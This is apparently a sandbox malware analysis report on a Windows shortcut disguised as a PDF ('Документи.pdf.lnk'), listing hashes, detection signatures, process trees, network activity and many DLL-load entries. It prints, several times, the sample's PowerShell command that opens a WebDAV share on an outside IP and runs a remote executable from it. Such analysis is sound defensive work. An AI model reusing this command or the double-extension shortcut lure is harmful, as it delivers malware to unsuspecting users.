
Windows Analysis Report
Документи.pdf.lnk

Overview

General Information

Sample name: Документи.pdf.lnk
renamed because original name is a hash value
Original sample name: .pdf.lnk
Analysis ID: 1560046
MD5: cffb40e13e3aa6761330090b42314c36
SHA1: eb73790a82578588c0080175f8ac215025e57389
SHA256: 330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
Tags: lnk, UKR, user-smica83

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Opens network shares
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w10x64
  • powershell.exe (PID: 2640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 5544 cmdline: "C:\Windows\explorer.exe" \\77.105.161.194@80\file\ MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7148 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 3636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, ProcessId: 2640, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3636, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: Документи.pdf.lnk; ReversingLabs: Detection: 23%

Networking

Source: C:\Windows\explorer.exe; Network Connect: 77.105.161.194 80
Source: Joe Sandbox View; ASN Name: ICOMF-ASRU ICOMF-ASRU
Source: unknown; TCP traffic detected without corresponding DNS query: 77.105.161.194
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: api.msn.com
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://77.105.161.194/
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://77.105.161.194/%
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://77.105.161.194/)
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://77.105.161.194/i
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://77.105.161.194:80/
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engine; Classification label: mal80.spyw.evad.winLNK@6/13@1/2
Source: C:\Windows\explorer.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv2hncff.ltq.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\explorer.exe
Source: unknown; Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\77.105.161.194@80\file\
Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
